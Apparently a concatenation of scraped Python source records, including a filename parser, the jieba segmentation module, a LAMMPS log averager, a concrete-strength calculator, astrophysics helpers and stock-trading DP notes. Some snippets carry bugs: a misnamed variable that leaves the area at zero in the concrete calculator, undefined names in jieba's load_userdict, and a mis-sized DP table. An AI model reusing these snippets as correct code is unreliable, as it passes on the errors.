fileset_id), file_name\"\n\t\t\t+ \" FROM bucket_listing where type_code=%s AND bible_id='PORERV'\"))\n\t\tfilenamesMap = db.selectMapList(sql, (typeCode))\n\t\tdb.close()\n\n\t\tif typeCode == \"audio\":\n\t\t\ttemplates = self.audioTemplates\n\t\telif typeCode == \"text\":\n\t\t\ttemplates = self.textTemplates\n\t\telif typeCode == \"video\":\n\t\t\ttemplates = self.videoTemplates\n\t\telse:\n\t\t\tprint(\"ERROR: unknown type_code: %s\" % (typeCode))\n\n\t\tfor prefix in filenamesMap.keys():\n\t\t\tfilenames = filenamesMap[prefix]\n\t\t\t(numErrors, files) = self.parseOneFileset2(templates, prefix, filenames)\n\t\t\tif numErrors == 0:\n\t\t\t\tself.parsedList.append((prefix))\n\t\t\telse:\n\t\t\t\tself.unparsedList.append((numErrors, prefix))\n\n\t\t\t#bookMap = self.buildBookChapterMap(files)\n\t\t\t#self.checkBookChapterMap(prefix, bookMap)\n\n\n\n\tdef parseOneFileset2(self, templates, prefix, filenames):\n\t\tnumErrors = 0\n\t\tfiles = []\n\t\tfor filename in filenames:\n\t\t\tfile = self.parseOneFilename2(templates, prefix, filename)\n\t\t\tself.validateCompleteness(file)\n\t\t\tfiles.append(file)\n\t\t\tif file.numErrors() > 0:\n\t\t\t\tnumErrors += 1\n\t\t\t\tprint(file.template.name, prefix, file.file, \", \".join(file.errors))\n\t\treturn (numErrors, files)\n\n\n\tdef parseOneFilename2(self, templates, prefix, filename):\n\t\tparserTries = []\n\t\tfor template in templates:\n\t\t\tfile = self.parse(template, filename)\n\t\t\tif file.numErrors == 0:\n\t\t\t\treturn file\n\t\t\tparserTries.append(file)\n\t\tbest = 1000000\n\t\tselected = None\n\t\tfor file in parserTries:\n\t\t\tif file.numErrors() < best:\n\t\t\t\tbest = file.numErrors()\n\t\t\t\tselected = file\n\t\treturn selected\n\n\n\tdef validateCompleteness(self, file):\n\t\tif file.template.name != \"audio_story\" and file.template.name != \"audio_story2\":\n\t\t\tif file.book == None or file.book == \"\":\n\t\t\t\tfile.errors.append(\"book_id is not found\")\n\t\t\tif file.chap == None or file.chap == \"\":\n\t\t\t\t\tfile.errors.append(\"chapter not found\")\n\t\t\tif file.type == \"mp4\" and file.chap.isdigit():\n\t\t\t\tif file.verseStart == None or file.verseStart == \"\":\n\t\t\t\t\tfile.errors.append(\"verse start not found\")\n\t\t\t\tif file.verseEnd == None or file.verseEnd == \"\":\n\t\t\t\t\tfile.errors.append(\"verse end not found\")\n\n\n\tdef buildBookChapterMap(self, files):\n\t\tbookMap = {}\n\t\tfor file in files:\n\t\t\tif file.book not in {None, \"\", \"FRT\", \"INT\", \"BAK\", \"LXX\", \"CNC\", \"GLO\", \"TDX\", \"NDX\", \"OTH\", \n\t\t\t\t\"XXA\", \"XXB\", \"XXC\", \"XXD\", \"XXE\", \"XXF\", \"XXG\"}:\n\t\t\t\tchapters = bookMap.get(file.book)\n\t\t\t\tif chapters == None:\n\t\t\t\t\tmaxChapter = self.chapterMap[file.book]\n\t\t\t\t\tchapters = [0] * (maxChapter + 1)\n\t\t\t\t\tbookMap[file.book] = chapters\n\t\t\t\tchap = int(file.chap)\n\t\t\t\tif len(chapters) > chap:\n\t\t\t\t\tchapters[chap] += 1\n\t\treturn bookMap\n\n\n\tdef checkBookChapterMap(self, prefix, bookMap):\n\t\tfor book in bookMap.keys():\n\t\t\tchapters = bookMap[book]\n\t\t\tempty = []\n\t\t\ttomany = []\n\t\t\tfor chapter in range(len(chapters)):\n\t\t\t\tcount = chapters[chapter]\t\n\t\t\t\tif count == 0:\n\t\t\t\t\tempty.append(chapter)\n\t\t\t\telif count > 2:\n\t\t\t\t\ttomany.append(chapter)\n\t\t\tif len(empty) > 0:\n\t\t\t\tprint(\"%s %s is missing chapters:\" % (prefix, book), empty)\n\t\t\tif len(tomany) > 0:\n\t\t\t\tprint(\"%s %s has too many chapters:\" % (prefix, book), tomany)\n\n\n\tdef summary2(self):\n\t\tfile = io.open(\"FilenameParser.out\", mode=\"w\", encoding=\"utf-8\")\n\t\tfor entry in self.parsedList:\n\t\t\tfile.write(\"%s\\n\" % entry)\n\t\tfile.write(\"\\n\\nUnparsed\\n\\n\")\n\t\tfor entry in self.unparsedList:\n\t\t\tfile.write(\"%d %s\\n\" % entry)\n\t\tfile.close()\n\n\nparser = FilenameParser()\nparser.process2('video')\nparser.summary2()\n\n\n\n\n\n\n\n\n\n\n","sub_path":"obsolete/py_deprecated/FilenameParser.py","file_name":"FilenameParser.py","file_ext":"py","file_size_in_byte":19419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"408879743","text":"from global_options_parser import *\nfrom daisylion.db.liondb import LionDB\n\ndef main():\n usage = \"\"\"usage: %prog [options] langid audioDir\"\"\"\n parser = GlobalOptionsParser(usage=usage)\n (options, args) = parser.parse_args()\n parser.check_args(2, args)\n \n session = LionDB(options.config, options.trace, options.app) \n langid, audio_dir = args\n session.import_audio_by_number(langid, audio_dir)\n\nif __name__==\"__main__\": main()\n","sub_path":"lionapp/branches/multipleObiProjects/lion/daisylion/scripts/import_audio_by_number.py","file_name":"import_audio_by_number.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"447178057","text":"from __future__ import absolute_import, unicode_literals\n__version__ = '0.36.2'\n__license__ = 'MIT'\n\nimport re\nimport os\nimport sys\nimport time\nimport tempfile\nimport marshal\nfrom math import log\nimport threading\nfrom functools import wraps\nimport logging\nfrom hashlib import md5\nfrom ._compat import *\nfrom . import finalseg\n\nDICTIONARY = \"dict.txt\"\nDICT_LOCK = threading.RLock()\nFREQ = {} # to be initialized\ntotal = 0\nuser_word_tag_tab = {}\ninitialized = False\npool = None\ntmp_dir = None\n\n_curpath = os.path.normpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\nlog_console = logging.StreamHandler(sys.stderr)\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nlogger.addHandler(log_console)\n\n\ndef setLogLevel(log_level):\n global logger\n logger.setLevel(log_level)\n\n\ndef gen_pfdict(f_name):\n lfreq = {}\n ltotal = 0\n with open(f_name, 'rb') as f:\n lineno = 0\n for line in f.read().rstrip().decode('utf-8').splitlines():\n lineno += 1\n try:\n word, freq = line.split(' ')[:2]\n freq = int(freq)\n lfreq[word] = freq\n ltotal += freq\n for ch in xrange(len(word)):\n wfrag = word[:ch + 1]\n if wfrag not in lfreq:\n lfreq[wfrag] = 0\n except ValueError as e:\n logger.debug('%s at line %s %s' % (f_name, lineno, line))\n raise e\n return lfreq, ltotal\n\n\ndef initialize(dictionary=None):\n global FREQ, total, initialized, DICTIONARY, DICT_LOCK, tmp_dir\n if not dictionary:\n dictionary = DICTIONARY\n with DICT_LOCK:\n if initialized:\n return\n\n abs_path = os.path.join(_curpath, dictionary)\n logger.debug(\"Building prefix dict from %s ...\" % abs_path)\n t1 = time.time()\n # default dictionary\n if abs_path == os.path.join(_curpath, \"dict.txt\"):\n cache_file = os.path.join(tmp_dir if tmp_dir else tempfile.gettempdir(),\"jieba.cache\")\n else: # custom dictionary\n cache_file = os.path.join(tmp_dir if tmp_dir else tempfile.gettempdir(),\"jieba.u%s.cache\" % md5(\n abs_path.encode('utf-8', 'replace')).hexdigest())\n\n load_from_cache_fail = True\n if os.path.isfile(cache_file) and os.path.getmtime(cache_file) > os.path.getmtime(abs_path):\n logger.debug(\"Loading model from cache %s\" % cache_file)\n try:\n with open(cache_file, 'rb') as cf:\n FREQ, total = marshal.load(cf)\n load_from_cache_fail = False\n except Exception:\n load_from_cache_fail = True\n\n if load_from_cache_fail:\n FREQ, total = gen_pfdict(abs_path)\n logger.debug(\"Dumping model to file cache %s\" % cache_file)\n try:\n fd, fpath = tempfile.mkstemp()\n with os.fdopen(fd, 'wb') as temp_cache_file:\n marshal.dump((FREQ, total), temp_cache_file)\n if os.name == 'nt':\n from shutil import move as replace_file\n else:\n replace_file = os.rename\n replace_file(fpath, cache_file)\n except Exception:\n logger.exception(\"Dump cache file failed.\")\n\n initialized = True\n\n logger.debug(\"Loading model cost %s seconds.\" % (time.time() - t1))\n logger.debug(\"Prefix dict has been built succesfully.\")\n\n\ndef require_initialized(fn):\n\n @wraps(fn)\n def wrapped(*args, **kwargs):\n global initialized\n if initialized:\n return fn(*args, **kwargs)\n else:\n initialize(DICTIONARY)\n return fn(*args, **kwargs)\n\n return wrapped\n\n\ndef __cut_all(sentence):\n dag = get_DAG(sentence)\n old_j = -1\n for k, L in iteritems(dag):\n if len(L) == 1 and k > old_j:\n yield sentence[k:L[0] + 1]\n old_j = L[0]\n else:\n for j in L:\n if j > k:\n yield sentence[k:j + 1]\n old_j = j\n\n\ndef calc(sentence, DAG, route):\n N = len(sentence)\n route[N] = (0, 0)\n logtotal = log(total)\n for idx in xrange(N - 1, -1, -1):\n route[idx] = max((log(FREQ.get(sentence[idx:x + 1]) or 1) -\n logtotal + route[x + 1][0], x) for x in DAG[idx])\n\n\n@require_initialized\ndef get_DAG(sentence):\n global FREQ\n DAG = {}\n N = len(sentence)\n for k in xrange(N):\n tmplist = []\n i = k\n frag = sentence[k]\n while i < N and frag in FREQ:\n if FREQ[frag]:\n tmplist.append(i)\n i += 1\n frag = sentence[k:i + 1]\n if not tmplist:\n tmplist.append(k)\n DAG[k] = tmplist\n return DAG\n\nre_eng = re.compile('[a-zA-Z0-9]', re.U)\n\n\ndef __cut_DAG_NO_HMM(sentence):\n DAG = get_DAG(sentence)\n route = {}\n calc(sentence, DAG, route)\n x = 0\n N = len(sentence)\n buf = ''\n while x < N:\n y = route[x][1] + 1\n l_word = sentence[x:y]\n if re_eng.match(l_word) and len(l_word) == 1:\n buf += l_word\n x = y\n else:\n if buf:\n yield buf\n buf = ''\n yield l_word\n x = y\n if buf:\n yield buf\n buf = ''\n\n\ndef __cut_DAG(sentence):\n DAG = get_DAG(sentence)\n route = {}\n calc(sentence, DAG, route=route)\n x = 0\n buf = ''\n N = len(sentence)\n while x < N:\n y = route[x][1] + 1\n l_word = sentence[x:y]\n if y - x == 1:\n buf += l_word\n else:\n if buf:\n if len(buf) == 1:\n yield buf\n buf = ''\n else:\n if not FREQ.get(buf):\n recognized = finalseg.cut(buf)\n for t in recognized:\n yield t\n else:\n for elem in buf:\n yield elem\n buf = ''\n yield l_word\n x = y\n\n if buf:\n if len(buf) == 1:\n yield buf\n elif not FREQ.get(buf):\n recognized = finalseg.cut(buf)\n for t in recognized:\n yield t\n else:\n for elem in buf:\n yield elem\n\nre_han_default = re.compile(\"([\\u4E00-\\u9FA5a-zA-Z0-9+#&\\._]+)\", re.U)\nre_skip_default = re.compile(\"(\\r\\n|\\s)\", re.U)\nre_han_cut_all = re.compile(\"([\\u4E00-\\u9FA5]+)\", re.U)\nre_skip_cut_all = re.compile(\"[^a-zA-Z0-9+#\\n]\", re.U)\n\n\ndef cut(sentence, cut_all=False, HMM=True):\n '''\n The main function that segments an entire sentence that contains\n Chinese characters into seperated words.\n\n Parameter:\n - sentence: The str(unicode) to be segmented.\n - cut_all: Model type. True for full pattern, False for accurate pattern.\n - HMM: Whether to use the Hidden Markov Model.\n '''\n sentence = strdecode(sentence)\n\n # \\u4E00-\\u9FA5a-zA-Z0-9+#&\\._ : All non-space characters. Will be handled with re_han\n # \\r\\n|\\s : whitespace characters. Will not be handled.\n\n if cut_all:\n re_han = re_han_cut_all\n re_skip = re_skip_cut_all\n else:\n re_han = re_han_default\n re_skip = re_skip_default\n blocks = re_han.split(sentence)\n if cut_all:\n cut_block = __cut_all\n elif HMM:\n cut_block = __cut_DAG\n else:\n cut_block = __cut_DAG_NO_HMM\n for blk in blocks:\n if not blk:\n continue\n if re_han.match(blk):\n for word in cut_block(blk):\n yield word\n else:\n tmp = re_skip.split(blk)\n for x in tmp:\n if re_skip.match(x):\n yield x\n elif not cut_all:\n for xx in x:\n yield xx\n else:\n yield x\n\n\ndef cut_for_search(sentence, HMM=True):\n \"\"\"\n Finer segmentation for search engines.\n \"\"\"\n words = cut(sentence, HMM=HMM)\n for w in words:\n if len(w) > 2:\n for i in xrange(len(w) - 1):\n gram2 = w[i:i + 2]\n if FREQ.get(gram2):\n yield gram2\n if len(w) > 3:\n for i in xrange(len(w) - 2):\n gram3 = w[i:i + 3]\n if FREQ.get(gram3):\n yield gram3\n yield w\n\n\n@require_initialized\ndef load_userdict(f):\n '''\n Load personalized dict to improve detect rate.\n\n Parameter:\n - f : A plain text file contains words and their ocurrences.\n\n Structure of dict file:\n word1 freq1 word_type1\n word2 freq2 word_type2\n ...\n Word type may be ignored\n '''\n if isinstance(f, string_types):\n f = open(f, 'rb')\n content = f.read().decode('utf-8').lstrip('\\ufeff')\n line_no = 0\n for line in content.splitlines():\n try:\n line_no += 1\n line = line.strip()\n if not line:\n continue\n tup = line.split(\" \")\n add_word(*tup)\n except Exception as e:\n logger.debug('%s at line %s %s' % (f_name, lineno, line))\n raise e\n\n\n@require_initialized\ndef add_word(word, freq=None, tag=None):\n \"\"\"\n Add a word to dictionary.\n\n freq and tag can be omitted, freq defaults to be a calculated value\n that ensures the word can be cut out.\n \"\"\"\n global FREQ, total, user_word_tag_tab\n word = strdecode(word)\n if freq is None:\n freq = suggest_freq(word, False)\n else:\n freq = int(freq)\n FREQ[word] = freq\n total += freq\n if tag is not None:\n user_word_tag_tab[word] = tag\n for ch in xrange(len(word)):\n wfrag = word[:ch + 1]\n if wfrag not in FREQ:\n FREQ[wfrag] = 0\n\n\ndef del_word(word):\n \"\"\"\n Convenient function for deleting a word.\n \"\"\"\n add_word(word, 0)\n\n\n@require_initialized\ndef suggest_freq(segment, tune=False):\n \"\"\"\n Suggest word frequency to force the characters in a word to be\n joined or splitted.\n\n Parameter:\n - segment : The segments that the word is expected to be cut into,\n If the word should be treated as a whole, use a str.\n - tune : If True, tune the word frequency.\n\n Note that HMM may affect the final result. If the result doesn't change,\n set HMM=False.\n \"\"\"\n ftotal = float(total)\n freq = 1\n if isinstance(segment, string_types):\n word = segment\n for seg in cut(word, HMM=False):\n freq *= FREQ.get(seg, 1) / ftotal\n freq = max(int(freq*total) + 1, FREQ.get(word, 1))\n else:\n segment = tuple(map(strdecode, segment))\n word = ''.join(segment)\n for seg in segment:\n freq *= FREQ.get(seg, 1) / ftotal\n freq = min(int(freq*total), FREQ.get(word, 0))\n if tune:\n add_word(word, freq)\n return freq\n\n\n__ref_cut = cut\n__ref_cut_for_search = cut_for_search\n\n\ndef __lcut(sentence):\n return list(__ref_cut(sentence, False))\n\n\ndef __lcut_no_hmm(sentence):\n return list(__ref_cut(sentence, False, False))\n\n\ndef __lcut_all(sentence):\n return list(__ref_cut(sentence, True))\n\n\ndef __lcut_for_search(sentence):\n return list(__ref_cut_for_search(sentence))\n\n\n@require_initialized\ndef enable_parallel(processnum=None):\n global pool, cut, cut_for_search\n if os.name == 'nt':\n raise Exception(\"jieba: parallel mode only supports posix system\")\n from multiprocessing import Pool, cpu_count\n if processnum is None:\n processnum = cpu_count()\n pool = Pool(processnum)\n\n def pcut(sentence, cut_all=False, HMM=True):\n parts = strdecode(sentence).splitlines(True)\n if cut_all:\n result = pool.map(__lcut_all, parts)\n elif HMM:\n result = pool.map(__lcut, parts)\n else:\n result = pool.map(__lcut_no_hmm, parts)\n for r in result:\n for w in r:\n yield w\n\n def pcut_for_search(sentence):\n parts = strdecode(sentence).splitlines(True)\n result = pool.map(__lcut_for_search, parts)\n for r in result:\n for w in r:\n yield w\n\n cut = pcut\n cut_for_search = pcut_for_search\n\n\ndef disable_parallel():\n global pool, cut, cut_for_search\n if pool:\n pool.close()\n pool = None\n cut = __ref_cut\n cut_for_search = __ref_cut_for_search\n\n\ndef set_dictionary(dictionary_path):\n global initialized, DICTIONARY\n with DICT_LOCK:\n abs_path = os.path.normpath(os.path.join(os.getcwd(), dictionary_path))\n if not os.path.isfile(abs_path):\n raise Exception(\"jieba: file does not exist: \" + abs_path)\n DICTIONARY = abs_path\n initialized = False\n\n\ndef get_abs_path_dict():\n return os.path.join(_curpath, DICTIONARY)\n\n\ndef tokenize(unicode_sentence, mode=\"default\", HMM=True):\n \"\"\"\n Tokenize a sentence and yields tuples of (word, start, end)\n\n Parameter:\n - sentence: the str(unicode) to be segmented.\n - mode: \"default\" or \"search\", \"search\" is for finer segmentation.\n - HMM: whether to use the Hidden Markov Model.\n \"\"\"\n if not isinstance(unicode_sentence, text_type):\n raise Exception(\"jieba: the input parameter should be unicode.\")\n start = 0\n if mode == 'default':\n for w in cut(unicode_sentence, HMM=HMM):\n width = len(w)\n yield (w, start, start + width)\n start += width\n else:\n for w in cut(unicode_sentence, HMM=HMM):\n width = len(w)\n if len(w) > 2:\n for i in xrange(len(w) - 1):\n gram2 = w[i:i + 2]\n if FREQ.get(gram2):\n yield (gram2, start + i, start + i + 2)\n if len(w) > 3:\n for i in xrange(len(w) - 2):\n gram3 = w[i:i + 3]\n if FREQ.get(gram3):\n yield (gram3, start + i, start + i + 3)\n yield (w, start, start + width)\n start += width\n","sub_path":"jieba/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"196538052","text":"\"\"\"Reads LAMMPS log file. Output the averages. \"\"\"\n\nimport argparse\nimport pandas\nfrom flowerpack.io.read_log import read_log\n\n\ndef main():\n\n # Command-line input.\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\"input\", help=\"Path of the log file.\")\n args = parser.parse_args()\n\n log = read_log(args.input)\n\n #Temp Press Lx Ly Lz Density E_mol E_pair PotEng KinEng TotEng\n mean_temp = log[\"Temp\"].mean()\n #mean_press = log[\"Press\"].mean()\n #mean_toteng = log[\"TotEng\"].mean()\n #mean_poteng = log[\"PotEng\"].mean()\n #mean_e_vdwl = log[\"E_vdwl\"].mean()\n #mean_e_coul = log[\"E_coul\"].mean()\n #mean_e_pair = log[\"E_pair\"].mean()\n #mean_e_bond = log[\"E_bond\"].mean()\n #mean_e_angle = log[\"E_angle\"].mean()\n #mean_e_dihed = log[\"E_dihed\"].mean()\n #mean_e_impro = log[\"E_impro\"].mean()\n #mean_e_long = log[\"E_long\"].mean()\n #mean_e_tail = log[\"E_tail\"].mean()\n mean_lx = log[\"Lx\"].mean()\n mean_ly = log[\"Ly\"].mean()\n mean_lz = log[\"Lz\"].mean()\n\n # Writing the output.\n with open(\"output_averages.csv\", \"a\") as file:\n file.write(\"{},{},{},{},{}\\n\".format(\n args.input, mean_temp, mean_lx, mean_ly, mean_lz))\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"flowerpack/analyze/log_average.py","file_name":"log_average.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"583607952","text":"import os\nimport math\nimport platform\n\nload = 0\nmeasure = 0\nfcj = 0\ng = 9.80665\nflag1 = False\nflag2 = False\nf = 0\narea = 0\n\ndef area_p(p):\n \"\"\" Return area based on perimeter of a circunference. \"\"\"\n math.fabs(p)\n return round((p * p) / (4 * math.pi),2)\n\ndef area_d(d):\n \"\"\" Return area based on perimeter of a circunference. \"\"\"\n math.fabs(d)\n return round((math.pi * d * d) / 4,2)\n\ndef get_force(load):\n \"Return the force in newtons\"\n return round(load * g, 2)\n\ndef get_fcj(f, a):\n \"\"\" Return the concrete resistence. \"\"\"\n return round(f / a, 2)\n\ndef cls():\n \" Clear the screen. \"\n if platform.system() == \"Windows\":\n os.system('cls')\n else:\n os.system('clear')\n\nwhile flag1 == False:\n print(\" \")\n print(\"--- COMANDOS ---\")\n print(\" \")\n print(\"1 - Novo cálculo.\")\n print(\"2 - Limpar tela.\")\n print(\"3 - Sair.\")\n print(\" \")\n \n opt = int(input(\"O que deseja fazer? \"))\n\n if opt == 1:\n print(\" \")\n load = float(input(\"Insira o valor da carga em (kg): \"))\n f = get_force(load)\n \n print(\" \")\n print(\"Agora, escolha um método de cálculo...\")\n print(\" \")\n print(\"--- MÉTODOS DE CÁLCULO ---\")\n print(\" \")\n print(\"4 - Utilizando o perímetro.\")\n print(\"5 - Utilizando o diâmetro.\")\n print(\" \")\n\n flag2 = False\n \n while flag2 == False:\n print(\" \")\n opt = int(input(\"Qual método deseja utilizar? \"))\n \n if opt == 4:\n print(\" \")\n measure = float(input(\"Insira o valor do perímetro em (mm): \"))\n roundarea = area_p(measure)\n fcj = get_fcj(f, area)\n flag2 = True\n elif opt == 5:\n print(\" \")\n measure = float(input(\"Insira o valor do diâmetro em (mm): \"))\n area = area_d(measure)\n fcj = get_fcj(f, area)\n flag2 = True\n else:\n print(\" \")\n print(\"Opção inválida...\")\n\n print(\" \")\n print(\"--- RESULTADOS ---\")\n print(\" \")\n print(\"Força: \", f, \" (N)\")\n print(\"Area: \", area, \" (mm²)\")\n print(\"fcj: \", fcj, \" (MPa)\") \n \n elif opt == 2:\n cls()\n elif opt == 3:\n flag1 = True\n os._exit(1)\n else:\n print(\" \")\n print(\"Opcao inválida, selecione outra...\")\n \n\n\n \n","sub_path":"concrete_resistence.py","file_name":"concrete_resistence.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"341511921","text":"from astropy import constants\nimport itertools\nimport numpy as np\nfrom scipy import integrate\n\n\"\"\"\n----------------------------------------------------------------------------------------------------------------\nFrom cloudyfsps written by Nell Byler.\n(Source https://github.com/nell-byler/cloudyfsps/blob/master/cloudyfsps/generalTools.py\n retrieved in October 2019)\n----------------------------------------------------------------------------------------------------------------\n\"\"\"\n\n\ndef calc_LogU(nuin0, specin0, nh, T, mstar=1.0):\n '''\n Claculates the number of lyman ionizing photons for given a spectrum\n Input spectrum must be in ergs/s/Hz!!\n Q = int(Lnu/hnu dnu, nu_0, inf) , number of hydrogen ionizing photons\n mstar is in units of solar mass\n Rin is in units of cm-3\n nh is in units of cm-3\n '''\n\n c = constants.c.cgs.value # cm/s\n h = constants.h.cgs.value # erg/s\n alpha = 2.5e-13*((T/(10**4))**(-0.85)) # cm3/s\n lam_0 = 911.6 * 1e-8 # Halpha wavelength in cm\n\n nuin = np.asarray(nuin0)\n specin = np.asarray(specin0)\n nu_0 = c / lam_0\n inds, = np.where(nuin >= nu_0)\n hlam, hflu = nuin[inds], specin[inds]\n nu = hlam[::-1]\n f_nu = hflu[::-1]\n integrand = f_nu / (h * nu)\n logQ = np.log10(integrate.simps(integrand, x=nu)*mstar) \n Rin = (3 * (10 ** logQ) / (4 * np.pi * nh * nh * alpha)) ** (1. / 3.)\n logU = np.log10((10**logQ)/(4*np.pi*Rin*Rin*nh*c))\n return logQ, Rin, logU\n\n\ndef air_to_vac(inpt, no_uv_conv=True):\n \"\"\"\n from morton 1991\n preserves order of input array\n \"\"\"\n if type(inpt) is float:\n wl = np.array([inpt])\n else:\n wl = np.asarray(inpt)\n to_vac = lambda lam: (6.4328e-5 + (2.94981e-2/(146.0-(1.0e4/lam)**2.0)) + (2.554e-4/(41.0-(1.0e4/lam)**2.0)))*lam + lam\n if no_uv_conv:\n outpt = np.array([to_vac(lam) if lam > 2000.0 else lam for lam in wl])\n else:\n outpt = to_vac(wl)\n return outpt\n\n\ndef sym_to_name(val=None):\n elem_keys = dict(He=\"helium\",\n C=\"carbon\",\n N=\"nitrogen\",\n O=\"oxygen\",\n Ne=\"neon\",\n Mg=\"magnesium\",\n Si=\"silicon\",\n S=\"sulphur\",\n Ar=\"argon\",\n Ca=\"calcium\",\n Fe=\"iron\",\n F=\"fluorine\",\n Na=\"sodium\",\n Al=\"aluminum\",\n Cl=\"chlorine\",\n Ni=\"nickel\",\n P=\"phosphorus\",\n Sc=\"scandium\",\n K=\"potassium\",\n Ti=\"titanium\",\n V=\"vanadium\",\n Cr=\"chromium\",\n Co=\"cobalt\",\n Cu=\"copper\",\n Mn=\"manganese\",\n Zn=\"zinc\")\n if val is None:\n return elem_keys\n else:\n try:\n return elem_keys[val.title()]\n except KeyError:\n print(\"element not in \", elem_keys.keys())\n\n\ndef grouper(n, iterable):\n \"\"\"\n Iterate through array in groups of n\n \"\"\"\n it = iter(iterable)\n while True:\n chunk = tuple(itertools.islice(it, n))\n if not chunk:\n return\n yield chunk\n","sub_path":"powderday/nebular_emission/cloudy_tools.py","file_name":"cloudy_tools.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"450043005","text":"# 买卖股票问题整理\n'''\n1. 给定一个数组,它的第 i 个元素是一支给定股票第 i 天的价格。\n如果你最多只允许完成一笔交易(即买入和卖出一支股票),求获得的最大利润。\n思路1:dp[i][j]表示第i天用户持股为j所获最大利润。\nj只有两个值:0表示不持股,1表示持股。\n则dp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\ndp[i][1] = max(dp[i-1][1], -prices[i]),因为题目只允许一次交易,因此不能加上dp[i-1][0]\n初始值:第0天不持股,dp[0][0]=0;第0天持股,dp[0][1]=-prices[0]\n'''\ndef maxProfit(prices):\n if len(prices)<2:\n return 0\n n = len(prices)\n dp = [[0]*n for _ in range(2)]\n dp[0][0] = 0\n dp[0][1] = -prices[0]\n for i in range(1, n):\n dp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\n dp[i][1] = max(dp[i-1][1], -prices[i])\n return dp[-1][0]\n# 考虑状态压缩,dp[i]仅仅依赖于dp[i-1]\ndef maxProfit2(prices):\n n = len(prices)\n if n<2:\n return 0\n dp = [0]*2\n dp[0] = 0\n dp[1] = -prices[0]\n for i in range(1, n):\n dp[0] = max(dp[0], dp[1]+prices[i])\n dp[1] = max(dp[1], -prices[i])\n return dp[0]\n\n'''\n2.可以尽可能地完成更多的交易(多次买卖一支股票),\n但不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)\n思路:dp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\ndp[i][1] = max(dp[i-1][1], dp[i-1][0]-prices[i])\ndp[0][0] = 0, dp[0][1] = -prices[0]\n'''\ndef maxProfitII(prices):\n n = len(prices)\n if n<2:\n return 0\n dp = [[0]*2 for _ in range(n)]\n dp[0][0] = 0\n dp[0][1] = -prices[0]\n for i in range(1, n):\n dp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\n dp[i][1] = max(dp[i-1][1], dp[i-1][0]-prices[i])\n return dp[-1][0]\n# 考虑状态压缩 dp[i]也仅仅依赖dp[i-1]\n\n'''\n3. 最多可以完成两笔交易。\n注:必须在再次购买前出售掉之前的股票\n思路:重新定义状态方程\ndp[i][0]表示未交易\ndp[i][1]表示第一次买入一支股票\ndp[i][2]表示第一次卖出一支股票\ndp[i][3]表示第二次买入一支股票\ndp[i][4]表示第二次卖出一支股票\n状态转移方程见代码\n初始化:第0天初始化为前两个状态,而状态3(第二次\n持股)只能赋值为一个不可能的数。\n'''\ndef maxProfitIII(prices):\n n = len(prices)\n if n<2:\n return 0\n dp = [[0]*5 for _ in range(n)]\n dp[0][1] = -prices[0]\n for i in range(n):\n dp[i][3] = float(\"-inf\")\n for i in range(1, n):\n dp[i][1] = max(dp[i-1][1], dp[i-1][0]-prices[i])\n dp[i][2] = max(dp[i-1][2], dp[i-1][1]+prices[i])\n dp[i][3] = max(dp[i-1][3], dp[i-1][2]-prices[i])\n dp[i][4] = max(dp[i-1][4], dp[i-1][3]+prices[i])\n # 最大值只发生在不持股的时候\n return max(0, dp[-1][2], dp[-1][4])\n# 状态压缩,dp[i]仅仅依赖于dp[i-1]\n\n'''\n4. 最多可以完成 k 笔交易\n注:必须在再次购买前出售掉之前的股票\n'''\n\n'''\n5. 在满足以下约束条件下,你可以尽可能地完成更多的交易(多次买卖一支股票):\n1) 必须在再次购买前出售掉之前的股票;\n2) 卖出股票后,你无法在第二天买入股票 (即冷冻期为 1 天)\n思路:增加一个状态,j取三个值:\n0表示不持股,1表示持股,2表示冷冻期\n状态转移方程:\ndp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\ndp[i][1] = max(dp[i-1][1], dp[i-1][2]-prices[i])\ndp[i][2] = dp[i-1][0]\n'''\ndef maxProfitV(prices):\n n = len(prices)\n if n<2:\n return 0\n dp = [[0]*3 for _ in range(n)]\n dp[0][1] = -prices[0]\n for i in range(1, n):\n dp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\n dp[i][1] = max(dp[i-1][1], dp[i-1][2]-prices[i])\n dp[i][2] = dp[i-1][0]\n return max(dp[-1][0], dp[-1][2])\n# 考虑状态压缩,dp[i]仅仅只依赖于dp[i-1]\n\n'''\n6. 你可以无限次地完成交易,但是你每次交易都需要付手续费fee。\n如果你已经购买了一个股票,在卖出它之前你就不能再继续购买股票了。\n思路:规定手续费在买入股票时扣除\n状态转移方程:\ndp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\ndp[i][1] = max(dp[i-1][1], dp[i-1][0]-prices[i]-fee)\n'''\ndef maxProfitVI(prices, fee):\n n = len(prices)\n if n<2:\n return 0\n dp = [[0]*2 for _ in range(n)]\n dp[0][1] = -prices[0]-fee\n for i in range(1, n):\n dp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\n dp[i][1] = max(dp[i-1][1], dp[i-1][0]-prices[i]-fee)\n return dp[-1][0]","sub_path":"20200305/bugAndSellStocks.py","file_name":"bugAndSellStocks.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} 